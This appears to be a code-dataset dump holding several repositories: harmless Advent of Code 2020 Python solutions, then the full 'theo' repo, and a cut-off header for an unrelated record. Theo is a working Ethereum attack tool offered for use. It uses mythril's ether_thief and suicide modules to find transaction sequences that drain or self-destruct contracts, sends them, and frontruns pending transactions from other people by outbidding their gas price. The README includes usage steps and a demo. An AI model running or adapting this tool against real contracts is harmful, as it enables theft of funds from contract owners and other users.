"text": "#!/usr/bin/env python\n\nimport copy\n\ndef get_neighbor_status(lines, row, column):\n ret = {}\n if column == 0:\n ret[\"left\"] = None\n else:\n ret[\"left\"] = lines[row][column-1]\n\n if row == 0:\n ret[\"up\"] = None\n else:\n ret[\"up\"] = lines[row-1][column]\n\n if column == len(lines[row])-1:\n ret[\"right\"] = None\n else:\n ret[\"right\"] = lines[row][column+1]\n\n if row == len(lines)-1:\n ret[\"down\"] = None\n else:\n ret[\"down\"] = lines[row+1][column]\n\n has_uldiag = column > 0 and row > 0\n if not has_uldiag:\n ret[\"uldiag\"] = None\n else:\n ret[\"uldiag\"] = lines[row-1][column-1] \n\n has_urdiag = column < len(lines[row])-1 and row > 0\n if not has_urdiag:\n ret[\"urdiag\"] = None\n else:\n ret[\"urdiag\"] = lines[row-1][column+1] \n\n has_lldiag = row < len(lines)-1 and column > 0 \n if not has_lldiag:\n ret[\"lldiag\"] = None\n else:\n ret[\"lldiag\"] = lines[row+1][column-1] \n\n has_lrdiag = column < len(lines[row])-1 and row < len(lines)-1\n if not has_lrdiag:\n ret[\"lrdiag\"] = None\n else:\n ret[\"lrdiag\"] = lines[row+1][column+1] \n\n return ret\n\ndef occupied_on(inp, outp, row, column):\n neighbors = get_neighbor_status(inp, row, column)\n can_sit = len([n for n in neighbors.values() if n in ('L', '.', None)]) == 8\n if can_sit:\n outp[row][column] = \"#\"\n return can_sit\n\ndef empty_on(inp, outp, row, column):\n neighbors = get_neighbor_status(inp, row, column)\n empty = inp[row][column] == \"#\" and len([n for n in neighbors.values() if n in ('#', )]) >= 4\n if empty:\n outp[row][column] = \"L\"\n return empty\n\ndef print_board(inp):\n for row in range(0, len(inp)):\n line = \"\".join(inp[row])\n print(line)\n\ndef process_board(inp, outp):\n for row in range(0, len(inp)):\n for column in range(0, len(inp[row])):\n if inp[row][column] == '.': \n continue\n occupied_on(inp, outp, row, column)\n empty_on(inp, outp, row, column)\n\ndef diff_boards(inp0, inp1):\n for row in range(0, len(inp0)):\n for column in range(0, len(inp0[row])):\n if inp0[row][column] != inp1[row][column]:\n return True\n \n return False\n\ndef num_seats_occupied(inp0):\n ret = 0\n for row in range(0, len(inp0)):\n for column in range(0, len(inp0[row])):\n if inp0[row][column] == '#':\n ret += 1\n \n return ret\n\nif __name__ == \"__main__\":\n inp = [list(x.strip()) for x in open('day11.txt', 'r').readlines()]\n output = copy.deepcopy(inp)\n\n while True:\n process_board(inp, output)\n\n if not diff_boards(inp, output):\n print(num_seats_occupied(output))\n break\n\n inp = output\n output = copy.deepcopy(inp)\n\n\n"
},
{
"alpha_fraction": 0.4423503279685974,
"alphanum_fraction": 0.4900221824645996,
"avg_line_length": 20,
"blob_id": "906dafd8c519b77af9ce3144990d63ff84e2afcf",
"content_id": "ba0ef6c8d6fc55c3c59723a5a273a02aff050074",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 902,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 43,
"path": "/day9.py",
"repo_name": "genesis32/adventofcode2020",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nlines = [int(x.strip()) for x in open('day9.txt', 'r').readlines()]\n\ndef sum_to_90433990():\n for x in range(0, len(lines)):\n res = [lines[x]]\n res_sum = lines[x]\n for y in range(x+1, len(lines)):\n res.append(lines[y])\n res_sum += lines[y]\n if res_sum > 90433990:\n break\n if res_sum == 90433990:\n return res\n return None\n\n\ndef no_sum(idx, v):\n start = idx-25\n end = idx\n\n for x in range(start, end+1):\n for y in range(start+1, end+1):\n if lines[x]+lines[y] == v:\n return True\n \n print(\"does not sum\", v)\n return False\n\ndef find_missing():\n idx = 25 \n while True:\n if idx >= len(lines):\n break\n\n no_sum(idx, lines[idx])\n\n idx += 1\n\nr = sum_to_90433990()\nprint(min(r) + max(r))\nfind_missing()"
},
{
"alpha_fraction": 0.500210165977478,
"alphanum_fraction": 0.5212274193763733,
"avg_line_length": 25.433332443237305,
"blob_id": "4a07c24df89216e44f400e8c6c9405c2e06b00e5",
"content_id": "9c4a7f44bbf6b79830ed288ac35d41c4dd6e1d94",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2379,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 90,
"path": "/day4.py",
"repo_name": "genesis32/adventofcode2020",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport re\n\ndef valid_record(record):\n required_fields = set([\"byr\", \"iyr\", \"eyr\", \"hgt\", \"hcl\", \"ecl\", \"pid\"])\n record_fields = set([x.split(\":\")[0] for x in record.split()])\n for r in record_fields:\n if r == \"cid\": continue\n if r in required_fields:\n required_fields.remove(r)\n\n return len(required_fields) == 0\n\ndef valid_record2(record):\n def validate_byr(v):\n vi = int(v)\n return vi >= 1920 and vi <= 2002\n \n def validate_iyr(v):\n vi = int(v)\n return vi >= 2010 and vi <= 2020\n \n def validate_eyr(v):\n vi = int(v)\n return vi >= 2020 and vi <= 2030\n\n def validate_hgt(v):\n if v.endswith(\"cm\"):\n vi = int(v[:-2])\n return vi >= 150 and vi <= 193\n if v.endswith(\"in\"):\n vi = int(v[:-2])\n return vi >= 59 and vi <= 76\n \n return False\n \n def validate_hcl(v):\n return re.search(\"^#([0-9a-f]{6})$\", v) != None\n \n def validate_ecl(v):\n return v in [\"amb\", \"blu\", \"brn\", \"gry\", \"grn\", \"hzl\", \"oth\"]\n \n def validate_pid(v):\n return re.search(\"^[0-9]{9}$\", v) != None\n\n required_fields = {\n \"byr\": validate_byr,\n \"iyr\": validate_iyr, \n \"eyr\": validate_eyr,\n \"hgt\": validate_hgt,\n \"hcl\": validate_hcl,\n \"ecl\": validate_ecl,\n \"pid\": validate_pid\n }\n record_fields = set([tuple(x.split(\":\")) for x in record.split()])\n validated_fields = set()\n for r, v in record_fields:\n if r == \"cid\": continue\n if r in required_fields:\n if required_fields[r](v):\n validated_fields.add(r)\n else:\n return False\n\n return validated_fields == set(required_fields.keys())\n \ndef split_records(lines):\n ret = []\n current_record = \"\"\n for line in lines:\n line = line.strip()\n if line == '':\n ret.append(current_record.strip())\n current_record = \"\"\n continue\n current_record += \" \" + line\n \n ret.append(current_record.strip())\n return ret\n\nlines = open(\"day4.txt\", \"r\").readlines()\nrecords = split_records(lines)\nnum_valid_records = 0\nfor record in records:\n is_valid = valid_record2(record)\n if valid_record2(record):\n num_valid_records += 1\n\nprint(num_valid_records)\n"
},
{
"alpha_fraction": 0.4826132655143738,
"alphanum_fraction": 0.5100105404853821,
"avg_line_length": 22.75,
"blob_id": "6001606bbcd4d0cce1e42f4eef8c1e806fe3e7f5",
"content_id": "d9ec63dc70330ad78ec8e6e26b2ea2cef7aa0194",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 949,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 40,
"path": "/day5.py",
"repo_name": "genesis32/adventofcode2020",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport math\n\ndef find_seat(d, mn, mx):\n if len(d) == 1:\n if d[0] in set([\"F\", \"L\"]):\n return mn\n if d[0] in set([\"B\", \"R\"]):\n return mx\n\n new_min = 0\n new_max = 0\n\n if d[0] in set([\"F\", \"L\"]):\n new_min = mn\n new_max = mx - int(math.ceil((mx - mn)/2))\n if d[0] in set([\"B\", \"R\"]):\n new_min = mn + int(math.ceil((mx - mn)/2))\n new_max = mx\n \n return find_seat(d[1:], new_min, new_max)\n\nlines = open(\"day5.txt\", \"r\").readlines()\nmax_seatid = -1\nseatids = []\nfor line in lines:\n line = line.strip()\n row = line[:-3]\n column = line[-3:]\n seatid = (find_seat(row, 0, 127) * 8) + find_seat(column, 0, 7)\n seatids.append(seatid)\n max_seatid = max(seatid, max_seatid)\n \nprint(\"max seatid:\", max_seatid)\n\nseatids.sort()\nfor i in range(0, len(seatids)-1):\n if seatids[i] != seatids[i+1]-1:\n print(\"my seat\", seatids[i]+1)"
}
] | 11 |
eniolasonowo/theo
|
https://github.com/eniolasonowo/theo
|
acf7c13a7083f2291fc8b6a5379ac2aced34a7fc
|
a2756e83c9685dda2f6b0a466bd14c03e6e8bc47
|
52cba304232ba4f41460cc28aaa8292633f9b5ed
|
refs/heads/master
| 2022-01-13T17:02:17.102566 | 2019-07-19T10:33:06 | 2019-07-19T10:33:06 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4845857322216034,
"alphanum_fraction": 0.686897873878479,
"avg_line_length": 15.741935729980469,
"blob_id": "c0d92d6a1d62153fb2feba057e5b24b77fb66d5e",
"content_id": "e6de0a0a6ea13e614ee8ab56de5584336e046f63",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 1038,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 62,
"path": "/requirements.txt",
"repo_name": "eniolasonowo/theo",
"src_encoding": "UTF-8",
"text": "asn1crypto==0.24.0\nattrdict==2.0.1\ncertifi==2019.6.16\ncffi==1.12.3\nchardet==3.0.4\ncoincurve==12.0.0\ncoloredlogs==10.0\nconfigparser==3.7.4\ncoverage==4.5.3\ncycler==0.10.0\ncytoolz==0.9.0.1\ndictionaries==0.0.1\neth-abi==1.3.0\neth-account==0.3.0\neth-hash==0.2.0\neth-keyfile==0.5.1\neth-keys==0.2.4\neth-rlp==0.1.2\neth-tester==0.1.0b32\neth-typing==2.1.0\neth-utils==1.6.1\nethereum==2.3.2\nethereum-input-decoder==0.2.2\nfuture==0.17.1\nhexbytes==0.2.0\nhumanfriendly==4.18\nidna==2.8\nJinja2==2.10.1\nkiwisolver==1.1.0\nlru-dict==1.1.6\nMarkupSafe==1.1.1\nmatplotlib==3.1.1\nmock==3.0.5\nmythril==0.21.8\nnumpy==1.16.4\nparsimonious==0.8.1\npbkdf2==1.3\npersistent==4.5.0\nplyvel==1.1.0\npy-ecc==1.4.2\npy-flags==1.1.2\npy-solc==3.2.0\npycparser==2.19\npycryptodome==3.8.2\npyethash==0.1.27\npyparsing==2.4.0\npysha3==1.0.2\npython-dateutil==2.8.0\nPyYAML==5.1.1\nrepoze.lru==0.7\nrequests==2.22.0\nrlp==1.1.0\nscrypt==0.8.13\nsemantic-version==2.6.0\nsix==1.12.0\ntoolz==0.9.0\ntransaction==2.4.0\nurllib3==1.25.3\nweb3==4.9.2\nwebsockets==6.0\nz3-solver==4.8.5.0\nzope.interface==4.6.0\n"
},
{
"alpha_fraction": 0.5976207256317139,
"alphanum_fraction": 0.6014695763587952,
"avg_line_length": 28.163265228271484,
"blob_id": "1553245d2ad83bc35c72a5f1384c45118cb8ec44",
"content_id": "94cae88c3c4bc71dcf56c5c14de96405d0b63d81",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2858,
"license_type": "no_license",
"max_line_length": 144,
"num_lines": 98,
"path": "/theo/interfaces/cli.py",
"repo_name": "eniolasonowo/theo",
"src_encoding": "UTF-8",
"text": "import argparse\nimport code\nimport json\nfrom theo.server import Server\nfrom theo.scanner import find_exploits\nfrom theo.file import load_file\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"Monitor contracts for balance changes or tx pool.\"\n )\n\n # Monitor tx pool\n tx_pool = parser.add_argument_group(\"Monitor transaction pool\")\n tx_pool.add_argument(\n \"--rpc-http\", help=\"Connect to this HTTP RPC\", default=\"http://127.0.0.1:8545\"\n )\n tx_pool.add_argument(\n \"--rpc-ws\", help=\"Connect to this WebSockets RPC\", default=None\n )\n tx_pool.add_argument(\n \"--rpc-ipc\", help=\"Connect to this IPC RPC\", default=None\n )\n tx_pool.add_argument(\"--account\", help=\"Use this account to send transactions from\")\n tx_pool.add_argument(\"--account-pk\", help=\"The account's private key\")\n\n # Contract to monitor\n parser.add_argument(\n \"--contract\", help=\"Contract to monitor\", type=str, metavar=\"ADDRESS\"\n )\n\n # Transactions to frontrun\n tx_monitor = parser.add_argument_group(\"Transactions to wait for\")\n tx_monitor.add_argument(\n \"--txs\",\n choices=[\"mythril\", \"file\"],\n help=\"Choose between: mythril (find transactions automatically with mythril), file (use the transactions specified in a JSON file).\",\n default=\"mythril\",\n )\n tx_monitor.add_argument(\n \"--txs-file\",\n help=\"The file which contains the transactions to frontrun\",\n metavar=\"FILE\",\n )\n\n # Run mode\n parser.add_argument(\n \"run_mode\",\n choices=[\"tx-pool\"],\n help=\"Choose between: balance (not implemented: monitor contract balance changes), tx-pool (if any transactions want to call methods).\",\n )\n\n args = parser.parse_args()\n # print(args.__dict__)\n\n if args.run_mode == \"tx-pool\":\n exec_tx_pool(args)\n\n\ndef exec_tx_pool(args):\n\n # Transactions to frontrun\n if args.txs == \"mythril\":\n print(\n \"Scanning for exploits in contract: {contract}\".format(\n contract=args.contract\n )\n )\n exploits = find_exploits(\n rpcHTTP=args.rpc_http,\n rpcWS=args.rpc_ws,\n rpcIPC=args.rpc_ipc,\n contract=args.contract,\n account=args.account,\n account_pk=args.account_pk,\n )\n if args.txs == \"file\":\n exploits = load_file(\n file=args.txs_file,\n rpcHTTP=args.rpc_http,\n rpcWS=args.rpc_ws,\n rpcIPC=args.rpc_ipc,\n contract=args.contract,\n account=args.account,\n account_pk=args.account_pk,\n )\n\n if len(exploits) == 0:\n print(\"No exploits found\")\n return\n\n print(\"Found exploits(s)\", exploits)\n\n # Start interface\n code.interact(local=locals())\n\n print(\"Shutting down\")\n"
},
{
"alpha_fraction": 0.5038594603538513,
"alphanum_fraction": 0.5129092335700989,
"avg_line_length": 35.47572708129883,
"blob_id": "e0f936c6dbdde51aabbec4165e7ded28efa46c5b",
"content_id": "06f10497a98653e62d3d2600bc4885ddfc7683a2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3757,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 103,
"path": "/theo/exploit/exploit.py",
"repo_name": "eniolasonowo/theo",
"src_encoding": "UTF-8",
"text": "from web3 import Web3\nimport time\n\n\nclass Exploit:\n def __init__(self, txs: list, w3: Web3, contract: str, account: str, account_pk: str):\n self.txs = txs\n self.w3 = w3\n self.contract = contract\n self.account = account\n\n self.contract = Web3.toChecksumAddress(contract)\n self.account = Web3.toChecksumAddress(account)\n self.account_private_key = account_pk \n\n def __repr__(self):\n return \"Exploit: (txs={})\".format(self.txs)\n\n def execute(self):\n for tx in self.txs:\n run_tx = {\n \"from\": self.account,\n \"to\": self.contract,\n \"gasPrice\": 10 ** 10, # 10 gwei\n \"gas\": 200000, # should be estimated\n \"value\": tx.tx_data[\"value\"],\n \"data\": tx.tx_data[\"input\"],\n }\n\n receipt = self.send_tx(run_tx)\n\n def frontrun(self, flush=False):\n print(\"Waiting for a victim to reach into the honey jar.\")\n\n # Wait for each tx and frontrun it.\n for tx in self.txs:\n victim_tx = self.wait_for(self.contract, tx, flush=flush)\n\n frontrun_tx = {\n \"from\": self.account,\n \"to\": self.contract,\n \"gasPrice\": hex(victim_tx[\"gasPrice\"] + 1),\n \"data\": victim_tx[\"input\"],\n \"gas\": victim_tx[\"gas\"],\n \"value\": victim_tx[\"value\"],\n }\n\n print(\"Frontrunning with tx: {tx}\".format(tx=frontrun_tx))\n receipt = self.send_tx(frontrun_tx)\n print(\n \"Mined transaction: {tx}\".format(tx=(receipt[\"transactionHash\"].hex()))\n )\n\n def send_tx(self, tx: dict) -> str:\n # Make sure the addresses are checksummed.\n tx[\"from\"] = Web3.toChecksumAddress(tx[\"from\"])\n tx[\"to\"] = Web3.toChecksumAddress(tx[\"to\"])\n tx[\"nonce\"] = self.w3.eth.getTransactionCount(self.account)\n\n signed_tx = self.w3.eth.account.signTransaction(tx, self.account_private_key)\n tx_hash = self.w3.eth.sendRawTransaction(signed_tx.rawTransaction)\n tx_receipt = self.w3.eth.waitForTransactionReceipt(tx_hash, timeout=300)\n\n return tx_receipt\n\n def wait_for(self, contract, tx, flush=False):\n # Setting up filter\n pending_filter = self.w3.eth.filter(\"pending\")\n\n # Ignore existing transactions and wait for new ones\n if flush is True:\n print(\n \"Flushing {} existing transactions.\".format(\n len(pending_filter.get_new_entries())\n )\n )\n\n while True:\n time.sleep(1)\n pending_txs_hashes = pending_filter.get_new_entries()\n print(\"Processing {} transactions.\".format(len(pending_txs_hashes)))\n for hash in pending_txs_hashes:\n pending_tx = self.w3.eth.getTransaction(hash)\n\n # Skip some uninteresting transactions\n if (pending_tx is None) or (pending_tx.get(\"to\") is None):\n continue\n\n # Skip transactions already mined\n if pending_tx.get(\"blockNumber\") is not None:\n continue\n\n if (pending_tx.get(\"to\", str(\"\")).lower() == contract.lower()) and (\n pending_tx.get(\"input\", \"\").lower()\n == tx.tx_data.get(\"input\", \"\").lower()\n ):\n print(\n \"Found pending tx: {tx} from: {sender}.\".format(\n tx=pending_tx.get(\"hash\", b\"0\").hex(),\n sender=pending_tx.get(\"from\"),\n )\n )\n return pending_tx\n"
},
{
"alpha_fraction": 0.5885416865348816,
"alphanum_fraction": 0.5989583134651184,
"avg_line_length": 20.33333396911621,
"blob_id": "71460790d9b8aa5078b03f08fbe54da82a16ce24",
"content_id": "340295524ef8efe4eef0f57902670c7d7b92d0a8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 192,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 9,
"path": "/theo/exploit/exploit_item.py",
"repo_name": "eniolasonowo/theo",
"src_encoding": "UTF-8",
"text": "from web3 import Web3\n\n\nclass ExploitItem:\n def __init__(self, tx_data: dict):\n self.tx_data = tx_data\n\n def __repr__(self):\n return \"Transaction: {}\".format(self.tx_data)\n"
},
{
"alpha_fraction": 0.5055031180381775,
"alphanum_fraction": 0.5165094137191772,
"avg_line_length": 26.06382942199707,
"blob_id": "f5e2952722116e1d396121b2fb586ad0e00ce526",
"content_id": "69b09f89b8d38b9badb863c1eb7cce195d7fccdf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1272,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 47,
"path": "/theo/file/__init__.py",
"repo_name": "eniolasonowo/theo",
"src_encoding": "UTF-8",
"text": "import json\nfrom web3 import Web3\nfrom theo.exploit.exploit import Exploit\nfrom theo.exploit.exploit_item import ExploitItem\n\n\ndef load_file(file, rpcHTTP=None, rpcWS=None, rpcIPC=None, contract=\"\", account=\"\", account_pk=\"\"):\n with open(file) as f:\n exploit_list = json.load(f)\n\n if rpcIPC is not None:\n print(\"Connecting to IPC: {rpc}.\".format(rpc=rpcIPC))\n w3 = Web3(\n Web3.IPCProvider(rpcIPC)\n )\n elif rpcWS is not None:\n print(\"Connecting to WebSocket: {rpc}.\".format(rpc=rpcWS))\n w3 = Web3(\n Web3.WebsocketProvider(rpcWS)\n )\n else:\n print(\"Connecting to HTTP: {rpc}.\".format(rpc=rpcHTTP))\n w3 = Web3(\n Web3.HTTPProvider(rpcHTTP)\n )\n\n exploits = []\n for exploit in exploit_list:\n txs = []\n for tx in exploit:\n txs.append(\n ExploitItem(\n tx_data={\"input\": tx.get(\"input\", \"0x\"), \"value\": tx.get(\"value\", \"\")}\n )\n )\n\n exploits.append(\n Exploit(\n txs=txs,\n w3=w3,\n contract=contract,\n account=account,\n account_pk=account_pk,\n )\n )\n\n return exploits\n"
},
{
"alpha_fraction": 0.6097561120986938,
"alphanum_fraction": 0.6151761412620544,
"avg_line_length": 27.384614944458008,
"blob_id": "8bc162512a83aaf3250cfe65dd619b1d9790be2f",
"content_id": "08e9f096a7e99e2713f4be8ae7f567e5e1e82583",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1107,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 39,
"path": "/theo/server/__init__.py",
"repo_name": "eniolasonowo/theo",
"src_encoding": "UTF-8",
"text": "from http.server import BaseHTTPRequestHandler, HTTPServer\n\n\ndef MakeHTTPRequestHandler(context):\n class HTTPRequestHandler(BaseHTTPRequestHandler):\n def __init__(self, *args, **kwargs):\n super(HTTPRequestHandler, self).__init__(*args, **kwargs)\n\n def do_GET(self):\n # https://docs.python.org/3.7/library/http.server.html?highlight=basehttprequesthandler#http.server.BaseHTTPRequestHandler\n self.send_response(200)\n self.send_header(\"Content-type\", \"text\")\n self.end_headers()\n\n print(\"Context\", context)\n\n self.wfile.write(bytes(self.path, \"UTF-8\"))\n\n return HTTPRequestHandler\n\n\nclass Server:\n host = None\n port = None\n\n def __init__(self, host, port):\n self.host = host\n self.port = port\n\n def start(self):\n handler = MakeHTTPRequestHandler(context={\"server\": \"postgres\"})\n\n httpd = HTTPServer((self.host, self.port), handler)\n\n try:\n httpd = httpd.serve_forever()\n except KeyboardInterrupt:\n httpd.socket.close()\n pass\n"
},
{
"alpha_fraction": 0.5651384592056274,
"alphanum_fraction": 0.5751248002052307,
"avg_line_length": 26.886075973510742,
"blob_id": "9d37b5cb61656f426e0f8625697c952b61f27a52",
"content_id": "8de3c34990dc1e32c85c587af09854c335a231ea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2203,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 79,
"path": "/theo/scanner/__init__.py",
"repo_name": "eniolasonowo/theo",
"src_encoding": "UTF-8",
"text": "import json\nimport re\nimport time\nfrom mythril.exceptions import CriticalError\nfrom mythril.mythril import MythrilAnalyzer, MythrilDisassembler, MythrilConfig\nfrom web3 import Web3\nfrom theo.exploit.exploit import Exploit\nfrom theo.exploit.exploit_item import ExploitItem\n\n\ndef find_exploits(rpcHTTP=None, rpcWS=None, rpcIPC=None, contract=\"\", account=\"\", account_pk=\"\") -> Exploit:\n conf = MythrilConfig()\n\n if re.match(r\"^https\", rpcHTTP):\n rpchost = rpcHTTP[8:]\n rpctls = True\n else:\n rpchost = rpcHTTP[7:]\n rpctls = False\n\n conf.set_api_rpc(rpchost, rpctls)\n\n try:\n disassembler = MythrilDisassembler(eth=conf.eth, enable_online_lookup=False)\n disassembler.load_from_address(contract)\n analyzer = MythrilAnalyzer(\n strategy=\"bfs\",\n disassembler=disassembler,\n address=contract,\n execution_timeout=120,\n max_depth=32,\n loop_bound=3,\n disable_dependency_pruning=False,\n onchain_storage_access=True,\n )\n except CriticalError as e:\n print(e)\n\n report = analyzer.fire_lasers(\n modules=[\"ether_thief\", \"suicide\"], transaction_count=3\n )\n\n if rpcIPC is not None:\n print(\"Connecting to IPC: {rpc}.\".format(rpc=rpcIPC))\n w3 = Web3(\n Web3.IPCProvider(rpcIPC)\n )\n elif rpcWS is not None:\n print(\"Connecting to WebSocket: {rpc}.\".format(rpc=rpcWS))\n w3 = Web3(\n Web3.WebsocketProvider(rpcWS)\n )\n else:\n print(\"Connecting to HTTP: {rpc}.\".format(rpc=rpcHTTP))\n w3 = Web3(\n Web3.HTTPProvider(rpcHTTP)\n )\n\n exploits = []\n for ri in report.issues:\n txs = []\n issue = report.issues[ri]\n\n for si in issue.transaction_sequence[\"steps\"]:\n txs.append(\n ExploitItem(tx_data={\"input\": si[\"input\"], \"value\": si[\"value\"]})\n )\n\n exploits.append(\n Exploit(\n txs=txs,\n w3=w3,\n contract=contract,\n account=account,\n account_pk=account_pk,\n )\n )\n\n return exploits\n"
},
{
"alpha_fraction": 0.6237590909004211,
"alphanum_fraction": 0.701522171497345,
"avg_line_length": 37.25316619873047,
"blob_id": "840fa6bec96de1272b6f14194515d496861e9b33",
"content_id": "99bc9731c88474daf8941af0a1048d064f77be44",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 6046,
"license_type": "no_license",
"max_line_length": 274,
"num_lines": 158,
"path": "/Readme.md",
"repo_name": "eniolasonowo/theo",
"src_encoding": "UTF-8",
"text": "# Theo\n\nTheo is a great hacker showing the other script kiddies how things should be done.\n\n\n\nHe knows [Karl](https://github.com/cleanunicorn/karl) from work.\n\nTheo's purpose is to fight script kiddies that try to be leet hackers. He can listen to them trying to exploit his honeypots and make them lose their funds, for his own gain.\n\n> \"You didn't bring me along for my charming personality.\"\n\n## Install\n\n```console\n$ git clone https://github.com/cleanunicorn/theo\n$ cd theo\n$ pip install -r requirements.txt\n```\n\nIt's recommended to use [virtualenv](https://virtualenv.pypa.io/en/latest/) if you're familiar with it.\n\nRequirements: \n\n- Python 3.5 or higher\n- An Ethereum node with RPC available\n- Accounts unlocked to be able to send transactions\n\n## Demo\n\n[Scrooge McEtherface](https://github.com/b-mueller/scrooge-mcetherface) tries to exploit a contract but Theo is able to successfully frontrun him.\n\n[](https://asciinema.org/a/KVbZpYZee39eWavEwiXMaemPI)\n\n## Usage\n\n### Help screen\n\nIt's a good idea to check the help screen first.\n\n```console\n$ python ./theo.py --help\nusage: theo.py [-h] [--rpc-http RPC_HTTP] [--rpc-ws RPC_WS]\n [--rpc-ipc RPC_IPC] [--account ACCOUNT] [--contract ADDRESS]\n [--txs {mythril,file}] [--txs-file FILE]\n {tx-pool}\n\nMonitor contracts for balance changes or tx pool.\n\npositional arguments:\n {tx-pool} Choose between: balance (not implemented: monitor\n contract balance changes), tx-pool (if any\n transactions want to call methods).\n\noptional arguments:\n -h, --help show this help message and exit\n --contract ADDRESS Contract to monitor\n\nMonitor transaction pool:\n --rpc-http RPC_HTTP Connect to this HTTP RPC\n --rpc-ws RPC_WS Connect to this WebSockets RPC\n --rpc-ipc RPC_IPC Connect to this IPC RPC\n --account ACCOUNT Use this account to send transactions from\n\nTransactions to wait for:\n --txs {mythril,file} Choose between: mythril (find transactions\n automatically with mythril), file (use the\n transactions specified in a JSON file).\n --txs-file FILE The file which contains the transactions to frontrun\n```\n\n### Symbolic execution\n\nA list of expoits is automatically identified using [mythril](https://github.com/ConsenSys/mythril).\n\nStart a session by running:\n\n```console\n$ python ./theo.py tx-pool --account=<your unlocked account> --contract=<honeypot>\n```\n\nIt will analyze the contract and will find a list of available exploits.\n\n```console\n$ python theo.py tx-pool --account=0xffcf8fdee72ac11b5c542428b35eef5769c409f0 --contract=0xd833215cbcc3f914bd1c9ece3ee7bf8b14f841bb \nScanning for exploits in contract: 0xd833215cbcc3f914bd1c9ece3ee7bf8b14f841bb\nFound exploit(s) [Exploit: (txs=[Transaction: {'input': '0xcf7a8965', 'value': '0xde0b6b3a7640000'}])]\nPython 3.7.3 (default, Jun 24 2019, 04:54:02) \n[GCC 9.1.0] on linux\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n(InteractiveConsole)\n>>>\n```\n\nYou can see the available exploits found. In this case one exploit was found. 
Each exploit is an [Exploit](https://github.com/cleanunicorn/theo/blob/263dc9f0cd34c4a0904529128c93f30b29eae415/theo/scanner/__init__.py#L9) object, having a list of transactions to exploit a bug.\n\n```console\n>>> exploits[0]\nExploit: (txs=[Transaction: {'input': '0xcf7a8965', 'value': '0xde0b6b3a7640000'}])\n```\n\nYou can start the frontrunning monitor to listen for other hackers (script kiddies really) trying to exploit his honeypots.\n\nUse `.frontrun()` to start listening for the exploit and when found send a transaction with a higher gas price.\n\n```console\n>>> exploits[0].frontrun()\nWaiting for a victim to reach into the honey jar.\nListening for Transaction: {'input': '0xcf7a8965', 'value': '0xde0b6b3a7640000'}.\nFound pending tx: 0x74eb78557b4659f27e7a8b82804ae97be9d0adfefd6a5652a097045f6de77a0b from: 0x1df62f291b2e969fb0849d99d9ce41e2f137006e.\nFrontrunning with tx: {'from': '0xffcf8fdee72ac11b5c542428b35eef5769c409f0', 'to': '0xd833215cbcc3f914bd1c9ece3ee7bf8b14f841bb', 'gasPrice': '0x3b9aca01', 'input': '0xcf7a8965', 'gas': '0x4c4b40', 'value': '0xde0b6b3a7640000'}\nMined transaction: 0x0b5e7ceedd600eaf013ca8bc74900e6d29b25ed422baaa776f42bec01870a288\n```\n\n> \"Oh, my God! The quarterback is toast!\"\n\nThis works very well for some specially crafted [contracts](./contracts/) or some other vulnerable contracts, as long as you make sure frontrunning is in your favor.\n\n### Load transactions from file\n\nInstead of identifying the exploits with mythril, you can specify the list of exploits yourself.\n\nCreate a file that looks like this [input-tx.json](./test/input-tx.json):\n\n```json\n[\n [\n {\n \"input\": \"0x4e71e0c8\",\n \"value\": \"0xde0b6b3a7640000\"\n },\n {\n \"input\": \"0x2e64cec1\",\n \"value\": \"0x0\"\n }\n ],\n [\n {\n \"input\": \"0x4e71e0c8\",\n \"value\": \"0xde0b6b3a7640000\"\n }\n ]\n]\n```\n\nThis one defines 2 exploits, the first one has 2 transactions and the second one only 1 transaction. After the exploits are loaded, frontrunning is the same.\n\n```console\n$ python ./theo.py --txs=file --contract=0xe78a0f7e598cc8b0bb87894b0f60dd2a88d6a8ab --account=0xffcf8fdee72ac11b5c542428b35eef5769c409f0 --txs-file=./test/input-tx.json tx-pool 130 ↵\nFound exploits(s) [Exploit: (txs=[Transaction: {'input': '0x4e71e0c8', 'value': '0xde0b6b3a7640000'}, Transaction: {'input': '0x2e64cec1', 'value': '0x0'}]), Exploit: (txs=[Transaction: {'input': '0x4e71e0c8', 'value': '0xde0b6b3a7640000'}])]\nPython 3.7.3 (default, Jun 24 2019, 04:54:02) \n[GCC 9.1.0] on linux\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n(InteractiveConsole)\n>>> exploits[0].frontrun()\nWaiting for a victim to reach into the honey jar.\nListening for Transaction: {'input': '0x4e71e0c8', 'value': '0xde0b6b3a7640000'}.\n```\n"
}
] | 8 |
safder-aree/chip8emulator
|
https://github.com/safder-aree/chip8emulator
|
ab9fccd0a649a991d9f01749d3135d8a35b7488d
|
a81b21bc8e91c12fc1c3ef96c5ea58335d649a56
|
76530d8efc37bfc67a88ec9b3e462ebc8a4221fd
|
